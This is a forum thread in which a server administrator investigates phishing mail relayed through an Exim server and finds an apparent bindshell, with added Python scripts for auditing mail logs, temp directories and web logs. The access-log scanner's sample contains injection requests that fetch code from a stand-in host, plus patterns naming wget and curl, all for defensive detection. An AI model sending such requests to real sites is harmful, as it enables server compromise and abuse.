Phishing Help

goodgirl

I have a server that we have found phishing emails are going through. I did add a limit on outgoing email to help find which user account the emails were going through.

I have found this part out. I know it isn't the user but I'm not sure what to look for to find how they are sending them.

I did: locate formmail.pl and found nothing.

Here is the header:
-----------------------------------------
> > Return-Path: <[email protected]>
> > Delivered-To: [email protected]
> > Received: (qmail 19009 invoked from network); 3 Jan 2006 12:44:40 -0000
> > Received: from xuxa.iecc.com (208.31.42.42)
> > by mail.iecc.com with SMTP; 3 Jan 2006 12:44:40 -0000
> > Received: (qmail 11448 invoked from network); 3 Jan 2006 12:44:40 -0000
> > Received: from rdns-225-226.securedprivatenetwork.net (HELO server.dedicatedroute.com) (216.144.225.226)
> > by smtp.abuse.net with SMTP; 3 Jan 2006 12:44:39 -0000
> > Received: from [62.139.80.98] (helo=d-1ca4bacff9d64)
> > by server.dedicatedroute.com with esmtpa (Exim 4.50)
> > id 1Eu76J-0005PP-85; Wed, 04 Jan 2006 03:46:43 -0800
> > From: "Bank of America" <[email protected]>
> > Subject: Online Banking Alert (update your information)
> > To: [email protected]
> > Content-Type: text/html;iso-8859-1
> > Reply-To: [email protected]
> > Date: Tue, 3 Jan 2006 02:44:26 +0200
> > X-Priority: 3
> > X-Library: Indy 8.0.25
> > X-DCC-IECC-Metrics: tom.iecc.com 1107; Body=1 Fuz1=1 Fuz2=1

I will post part of the mainlog for exim in a few mins.
 
exim mainlog -----------------------------------

2006-01-04 16:49:48 1Et9aS-0000vh-4O failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:48 1Et9aS-0000vh-4O ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:48 1EuJK8-0001L3-Si <= <> R=1Et9aS-0000vh-4O U=mail P=local S=4154 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:48 1Et9aS-0000vh-4O Completed
2006-01-04 16:49:48 1EuJK8-0001L3-Si => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4297
2006-01-04 16:49:48 1EuJK8-0001L3-Si Completed
2006-01-04 16:49:48 1Et9uZ-0005Zs-H2 failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:48 1Et9uZ-0005Zs-H2 ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:49 1EuJK8-0001LB-VK <= <> R=1Et9uZ-0005Zs-H2 U=mail P=local S=4149 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:49 1Et9uZ-0005Zs-H2 Completed
2006-01-04 16:49:49 1EuJK8-0001LB-VK => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4292
2006-01-04 16:49:49 1EuJK8-0001LB-VK Completed
2006-01-04 16:49:50 1Et9AW-0005hr-83 failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:50 1Et9AW-0005hr-83 == [email protected] R=userforward defer (-1): failed to stat /etc/news/. (No such file or directory)
2006-01-04 16:49:51 1Et9hk-0002P8-4X failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:51 1Et9hk-0002P8-4X ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:51 1EuJKB-0001xw-OH <= <> R=1Et9hk-0002P8-4X U=mail P=local S=4149 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:51 1Et9hk-0002P8-4X Completed
2006-01-04 16:49:51 1EuJKB-0001xw-OH => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4292
2006-01-04 16:49:51 1EuJKB-0001xw-OH Completed
2006-01-04 16:49:51 1EtA3I-0007eV-2z failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:51 1EtA3I-0007eV-2z ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:51 1EuJKB-0001yB-RW <= <> R=1EtA3I-0007eV-2z U=mail P=local S=4159 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:51 1EtA3I-0007eV-2z Completed
2006-01-04 16:49:51 1EuJKB-0001yB-RW => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4302
2006-01-04 16:49:51 1EuJKB-0001yB-RW Completed
2006-01-04 16:49:51 1Et9oP-00046R-CV failed to expand condition "${perl{check_limits}}" for lookuphost router: You (houseplag) have reach your daily email limit of 200 emails

2006-01-04 16:49:51 1Et9oP-00046R-CV ** [email protected] F=<[email protected]>: Unrouteable address
2006-01-04 16:49:51 1EuJKB-0001yH-UE <= <> R=1Et9oP-00046R-CV U=mail P=local S=4143 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-04 16:49:51 1Et9oP-00046R-CV Completed
2006-01-04 16:49:51 1EuJKB-0001yH-UE => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=4286
 
Here is some of the log from before I put on the limit.


2006-01-01 11:31:07 1Et8v4-0003mh-Vm Completed
2006-01-01 11:31:07 1Et8v4-0003fC-Dc <= [email protected] H=(d-1ca4bacff9d64) [62.139.86.76] P=esmtpa A=login:[email protected] S=3308 T="Update Your Wells Fargo Accounts.." from <[email protected]> for [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
2006-01-01 11:31:07 1Et8v3-0003fV-N6 SMTP error from remote mailer after initial connection: host mailhost.cityclub-ftw.com [208.254.104.2]: 421 cityclub.cityclub-ftw.com connection limit reached
2006-01-01 11:31:07 1Et8v3-0003fc-N9 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3388 H=hoth.gcn.ou.edu [129.15.192.23] C="250 Ok: queued as 5F913740C4"
2006-01-01 11:31:07 1Et8uy-0003fV-2q => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mx4.texoma.net [209.151.96.27] C="250 2.0.0 jBVKSMF2002183 Message accepted for delivery"
2006-01-01 11:31:07 1Et8us-0003fc-Or => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mx1.mail.yahoo.com [67.28.113.11] C="250 ok dirdel"
2006-01-01 11:31:07 1Et8v3-0003fc-N9 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3388 H=mx4.hotmail.com [65.54.244.104] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:07 1Et8v3-0003fc-N9 ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after RCPT TO:<[email protected]>: host mx4.hotmail.com [65.54.244.104]: 550 Requested action not taken: mailbox unavailable
2006-01-01 11:31:07 1Et8uy-0003fV-2q ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after RCPT TO:<[email protected]>: host mx8.airmail.net [209.196.77.105]: 550 unrouteable address ([email protected]), check your spelling
2006-01-01 11:31:07 1Et8uy-0003fV-2q => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mx2.hotmail.com [65.54.244.40] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:07 1Et8v3-0003fU-UU => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3380 H=inmail.ev1.net [207.218.192.49] C="250 Message queued"
2006-01-01 11:31:08 1Et8v6-0003mx-1E <= <> H=mx4.texoma.net [209.151.96.27] P=esmtps X=TLSv1:AES256-SHA:256 S=5636 [email protected] T="Returned mail: see transcript for details" from <> for [email protected]
2006-01-01 11:31:08 1Et8v6-0003mx-1E => jack <[email protected]> F=<> R=virtual_user T=virtual_localdelivery S=5779
2006-01-01 11:31:08 1Et8v6-0003mx-1E Completed
2006-01-01 11:31:08 1Et8v3-0003fB-Ua ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [64.12.138.89]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8v3-0003fB-Ua ** [email protected] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [64.12.138.89]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8v3-0003fB-Ua => [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp S=3381 H=mail.wnj.org [208.14.30.33] C="250 2.0.0 XBVK1V8HT000013EC Message accepted for delivery"
2006-01-01 11:31:08 1Et8uy-0003fV-2q => [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=clmboh-01.mgw.rr.com [65.24.7.13] C="250 ok: Message 998670843 accepted"
2006-01-01 11:31:08 1Et8v3-0003fV-N6 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3390 H=mx-1.zoominternet.net [24.154.1.20] C="250 2.0.0 jBVKTDqG028107 Message accepted for delivery"
2006-01-01 11:31:08 1Et8v4-0003fC-Dc ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-03.mx.aol.com [205.188.159.57]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8v4-0003fC-Dc ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-03.mx.aol.com [205.188.159.57]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:08 1Et8us-0003fc-Or => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3384 H=mail17.commercestreet.com [168.75.239.17] C="250 Ok: queued as B435730F98"
2006-01-01 11:31:08 1Et8v3-0003fV-N6 => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3390 H=mx3.hotmail.com [65.54.244.72] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:08 1Et8v3-0003fV-N6 -> [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3390 H=mx3.hotmail.com [65.54.244.72] C="250 <[email protected]> Queued mail for delivery"
2006-01-01 11:31:09 1Et8v3-0003fc-N9 ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [205.188.156.249]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:09 1Et8v3-0003fc-N9 ** [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mailer after end of data: host mailin-04.mx.aol.com [205.188.156.249]: 554-: (HVU:B1) http://postmaster.info.aol.com/errors/554hvub1.html\n554 TRANSACTION FAILED
2006-01-01 11:31:09 1Et8v3-0003fU-UU SMTP error from remote mailer after end of data: host mx3.mail.yahoo.com [64.156.215.18]: 451 mta342.mail.scd.yahoo.com Resources temporarily unavailable. Please try again later [#4.16.5].
2006-01-01 11:31:09 1Et8v3-0003fB-Ua => [email protected] <[email protected]> F=<[email protected]> R=lookuphost T=remote_smtp S=3381 H=cluster6.us.messagelabs.com [216.82.254.67] X=TLSv1:AES256-SHA:256 C="250 ok 1136060952 qp 30916 server-19.tower-44.messagelabs.com!1136060951!17872638!1"
2006-01-01 11:31:09 1Et8un-0003fV-Jq => [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3389 H=smtp.theaardvark.com [64.105.96.123] X=TLSv1:DES-CBC3-SHA:168 C="250 OK"
2006-01-01 11:31:09 1Et8un-0003fV-Jq -> [email protected] F=<[email protected]> R=lookuphost T=remote_smtp S=3389 H=smtp.theaardvark.com [64.105.96.123] X=TLSv1:DES-CBC3-SHA:168 C="250 OK"
2006-01-01 11:31:09 1Et8v7-0003nG-EP <= <> R=1Et8un-0003fV-Jq U=mail P=local S=5202 T="Mail delivery failed: returning message to sender" from <> for [email protected]
2006-01-01 11:31:09 1Et8un-0003fV-Jq Completed
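The mainlog excerpt above already carries the answer to "which account is this going through": every `<=` (message accepted) line records the authenticated login (`A=login:...`), the submitting IP and HELO name, and the full recipient list. The following script is an added example, not code from the thread or from Exim, that parses those lines and aggregates per authenticated account, flagging any account that submits to more recipients than a threshold or authenticates from more than one source IP. The sample log, the `example.invalid` addresses and the thresholds are constructed for the example; the `houseplag` account name and the two source IPs are the ones that appear in the thread.

```python
import re
import sys
from collections import defaultdict

# Constructed sample in Exim mainlog format, modelled on the thread's excerpt.
# Queue IDs, hosts and addresses are made up; "houseplag" is the account the
# thread's rate limit named. The last line is a bounce whose subject contains
# the word "for", which the parser must not mistake for the recipient list.
SAMPLE_LOG = """\
2006-01-01 11:31:07 1Et8v4-0003fC-Dc <= sender@example.invalid H=(d-1ca4bacff9d64) [62.139.86.76] P=esmtpa A=login:houseplag@example.invalid S=3308 T="Update Your Wells Fargo Accounts.." from <sender@example.invalid> for a@x.invalid b@x.invalid c@x.invalid
2006-01-01 11:31:07 1Et8v4-0003fC-Dc => a@x.invalid F=<sender@example.invalid> R=lookuphost T=remote_smtp S=3388 H=mx.x.invalid [192.0.2.10] C="250 Ok"
2006-01-01 11:32:10 1Et8v5-0003fD-Aa <= sender@example.invalid H=(d-1ca4bacff9d64) [62.139.80.98] P=esmtpa A=login:houseplag@example.invalid S=3310 T="Update Your Wells Fargo Accounts.." from <sender@example.invalid> for d@x.invalid e@x.invalid
2006-01-01 11:40:00 1Et8w0-0003gG-Bb <= alice@example.invalid H=(laptop) [198.51.100.7] P=esmtpa A=login:alice@example.invalid S=1200 T="lunch?" from <alice@example.invalid> for bob@example.invalid
2006-01-01 11:41:00 1Et8w1-0003gH-Cc <= <> H=mx4.texoma.net [209.151.96.27] P=esmtps S=5636 T="Returned mail: see transcript for details" from <> for jack@example.invalid
"""

# "<=" lines end with "... from <envelope> for rcpt1 rcpt2 ...". The greedy
# "(.*) for" picks the LAST " for ", so a subject containing "for" is safe.
ACCEPT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<id>\S+) <= (?P<env_from>\S+) "
    r"(?P<fields>.*) for (?P<rcpts>.*)$"
)
HOST_RE = re.compile(r"H=(?P<host>\S+(?: \([^)]*\))?) \[(?P<ip>[^\]]+)\]")
AUTH_RE = re.compile(r"A=(?P<method>[^:\s]+):(?P<user>\S+)")
PROTO_RE = re.compile(r"P=(?P<proto>\S+)")
SUBJ_RE = re.compile(r'T="(?P<subject>[^"]*)"')


def parse_accept(line):
    """Parse one Exim '<=' (message accepted) line; return None for any other line."""
    m = ACCEPT_RE.match(line.strip())
    if not m:
        return None
    fields = m.group("fields")
    host = HOST_RE.search(fields)
    auth = AUTH_RE.search(fields)
    proto = PROTO_RE.search(fields)
    subj = SUBJ_RE.search(fields)
    return {
        "timestamp": m.group("ts"),
        "queue_id": m.group("id"),
        "envelope_from": m.group("env_from"),
        "helo": host.group("host") if host else None,
        "ip": host.group("ip") if host else None,
        "protocol": proto.group("proto") if proto else None,
        "auth_user": auth.group("user") if auth else None,
        "subject": subj.group("subject") if subj else None,
        "recipients": m.group("rcpts").split(),
    }


def summarize(log_text):
    """Aggregate accepted messages per authenticated account (bounces and
    unauthenticated inbound mail land under 'unauthenticated')."""
    stats = defaultdict(lambda: {"messages": 0, "recipients": 0, "ips": set(), "subjects": set()})
    for line in log_text.splitlines():
        entry = parse_accept(line)
        if entry is None:
            continue
        s = stats[entry["auth_user"] or "unauthenticated"]
        s["messages"] += 1
        s["recipients"] += len(entry["recipients"])
        if entry["ip"]:
            s["ips"].add(entry["ip"])
        if entry["subject"]:
            s["subjects"].add(entry["subject"])
    return dict(stats)


def flag_suspects(stats, max_recipients=200, max_ips=1):
    """Accounts over the recipient budget (the thread used 200/day) or
    authenticating from more than max_ips distinct source addresses."""
    return sorted(
        user for user, s in stats.items()
        if user != "unauthenticated"
        and (s["recipients"] > max_recipients or len(s["ips"]) > max_ips)
    )


if __name__ == "__main__":
    # Usage: python exim_submitters.py /var/log/exim/mainlog  (default: the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    stats = summarize(text)
    for user, s in sorted(stats.items(), key=lambda kv: -kv[1]["recipients"]):
        print(f"{user}: {s['messages']} msgs, {s['recipients']} rcpts, ips={sorted(s['ips'])}")
    print("suspects:", flag_suspects(stats))
```

Run it against the real mainlog once the recipient threshold reflects normal traffic for the box; the second signal, one login used from several client addresses within minutes, is usually the clearer indicator that the credentials are being used from somewhere other than the customer's own machine.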
 
I'd be looking at vulnerable scripts on the server - and also checking the contents of /tmp and /var/tmp ... sounds like you might have a bindshell running

do a

ls -la /tmp

look for .x - anything with a . in the beginning is likely to be a bindshell
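A one-off `ls -la` catches what is there right now; the same check is worth scripting so it can be re-run after cleanup. The script below is an added example, not code from the thread or from hostpc.com, that walks the temp directories and reports the things the reply tells you to look for: dot-prefixed names, dropped source or script files (`.c`, `.pl`, `.php`, `.sh`) and anything with an execute bit, together with the owning uid so a file owned by the web-server account stands out. The `demo()` function builds a constructed throwaway tree (an empty placeholder named after the file found in the thread) purely so the check can be exercised without touching the real `/tmp`.

```python
import os
import shutil
import stat
import sys
import tempfile

# File extensions that have no business sitting in a scratch directory on a mail/web host.
SOURCE_EXTS = {".c", ".pl", ".php", ".sh", ".py"}


def audit_tmp_dirs(paths):
    """Return a list of suspicious entries under the given directories.

    Each finding is {"path", "uid", "reasons"}. Symlinks are not followed and
    are inspected with lstat, so a planted link cannot redirect the walk.
    """
    findings = []
    for base in paths:
        if not os.path.isdir(base):
            continue
        for root, dirs, files in os.walk(base):
            for name in dirs + files:
                full = os.path.join(root, name)
                reasons = []
                if name.startswith("."):
                    reasons.append("hidden name")
                if os.path.splitext(name)[1].lower() in SOURCE_EXTS:
                    reasons.append("source/script file")
                try:
                    st = os.lstat(full)
                except OSError:
                    continue  # vanished between listing and stat; nothing to report
                if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
                    reasons.append("executable")
                if reasons:
                    findings.append({"path": full, "uid": st.st_uid, "reasons": reasons})
    return findings


def build_sample_tree(base):
    """Constructed layout for the demo: a hidden dir holding an executable, a
    dropped C file (empty placeholder, not real source) and a benign session file."""
    hidden = os.path.join(base, ".x")
    os.makedirs(hidden)
    runner = os.path.join(hidden, "run")
    with open(runner, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(runner, 0o755)
    with open(os.path.join(base, "bindshe.c"), "w") as f:
        f.write("/* placeholder */\n")
    with open(os.path.join(base, "sess_abc123"), "w") as f:
        f.write("")


def demo():
    """Audit a constructed tree in a private temp dir; return {relative path: reasons}."""
    base = tempfile.mkdtemp()
    try:
        build_sample_tree(base)
        return {os.path.relpath(f["path"], base): f["reasons"] for f in audit_tmp_dirs([base])}
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    # Usage: python tmp_audit.py [dir ...]   (default: /tmp and /var/tmp)
    targets = sys.argv[1:] or ["/tmp", "/var/tmp"]
    for f in audit_tmp_dirs(targets):
        print(f"{f['path']}  uid={f['uid']}  {', '.join(f['reasons'])}")
```

The "executable" test is deliberately applied to regular files only, so a hidden directory is reported for its name and its contents are reported on their own merits; that is what surfaces a `.x/run` style drop even when the directory itself looks empty to a casual `ls`.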
 
hostpc.com said:
I'd be looking at vulnerable scripts on the server - and also checking the contents of /tmp and /var/tmp ... sounds like you might have a bindshell running

do a

ls -la /tmp

look for .x - anything with a . in the beginning is likely to be a bindshell

I only see one in the beginning of tmp
iroffer1.2b22

And then I see ls /var/tmp
1 bindshe.c


in the /var/tmp.
 
You appear to have been hacked.

The problem is that if you didn't recognize a file named bindshe.c as evidence of a bindshell, in spite of the similarity of names, then you may not have the skills necessary to clean your server; you might want to hire a security firm or person to check out your server for you.

If you do, be sure to find someone you can trust. If you just post a request on a help forum you're shooting dice.

Jeff
 
I'm not sure if I'd define a bindshell as a "hack" per se... if I did, it'd be a pretty loose interpretation.

It could have been uploaded through any vulnerable script such as an un-updated awstats, phpBB, or a bizillion others out there (those are just two popular ones). Scouring through the apache log files for things like wget, curl, etc is a good start.

I agree, you should probably look to someone for help in cleaning up the server, and making sure that the tmp directories are only being used for what they're intended - that is, not for execution of perl or php scripts... just "temporary" storage, session files, etc. When you find someone to help you - ask to get notes on what they're doing so you can learn for the future and perhaps help yourself next time - or even better, help someone else who needs a hand.

Joe
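Joe's suggestion to scour the Apache logs for `wget`, `curl` and similar is easy to do badly: a plain `grep curl` also matches every legitimate page with "curl" in its path. The script below is an added example, not code from the thread or from Joe, that parses combined-format access log lines, URL-decodes only the query string, and reports a request when a download tool name is followed by a URL, or when a parameter value is itself a remote URL (a weaker signal, listed separately). The sample log lines, the `example.invalid` host and the script paths are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample in Apache combined log format. Lines 1, 3 and 6 are the
# ones a reviewer would want to see; 4 and 5 are look-alikes that a naive
# "grep wget|curl" would wrongly report.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [01/Jan/2006:11:20:01 -0500] "GET /cgi-bin/stats.cgi?config=site&x=wget%20http://example.invalid/t HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [01/Jan/2006:11:21:44 -0500] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2006:11:22:10 -0500] "GET /forum/viewtopic.php?t=42&h=%63%75%72%6c%20http://example.invalid/s HTTP/1.1" 200 300 "-" "Mozilla/4.0"
192.0.2.77 - - [01/Jan/2006:11:25:00 -0500] "GET /docs/curl-howto.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.78 - - [01/Jan/2006:11:26:00 -0500] "GET /search.php?q=wget+tutorial HTTP/1.1" 200 900 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2006:11:27:30 -0500] "GET /page.php?include=http://example.invalid/c.txt HTTP/1.1" 200 410 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A download tool used as a command: tool name, optional flags, then a URL.
TOOL_RE = re.compile(
    r"(?:^|[=\s;|&`$()])(?P<tool>wget|curl|fetch|lynx)\s+(?:-\S+\s+)*(?:https?|ftp)://", re.I
)
# A parameter whose value is a remote URL (classic remote-include indicator).
URL_RE = re.compile(r"=\s*(?:https?|ftp)://", re.I)


def decode_query(target):
    """Return the URL-decoded query string of a request target ('' if none).

    Decodes a second time when percent signs survive the first pass, so a
    doubly-encoded payload is still inspected in the clear."""
    _, _, query = target.partition("?")
    decoded = unquote_plus(query)
    if "%" in decoded:
        decoded = unquote_plus(decoded)
    return decoded


def scan_access_log(text):
    """Return findings for requests whose query string looks like a command
    injection or remote-include attempt; order follows the log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m.group("target"))
        reasons = []
        tool = TOOL_RE.search(query)
        if tool:
            reasons.append(f"download tool in query: {tool.group('tool').lower()}")
        if URL_RE.search(query):
            reasons.append("remote URL passed as parameter")
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "decoded_query": query,
                "reasons": reasons,
            })
    return findings


def top_sources(findings):
    """Client addresses ranked by number of flagged requests."""
    return Counter(f["ip"] for f in findings).most_common()


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_ACCESS_LOG)
    for h in hits:
        print(f"{h['timestamp']} {h['ip']} {h['status']} {h['target']}  <- {', '.join(h['reasons'])}")
    print("by source:", top_sources(hits))
```

A status of 200 on a flagged request is the line to chase first: it tells you the script at that path accepted the input, which is where the `/tmp` audit and the "which scripts are out of date" question in Joe's reply come together. Feed the real log in through `scan_access_log(open(path).read())`.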
 
And I agree with you, Joe, that I've been known to overuse the word hack.

For which I apologize.

If someone creates a bindshell on your server and uses it to send phishing emails perhaps the word compromised would be better.

Jeff
 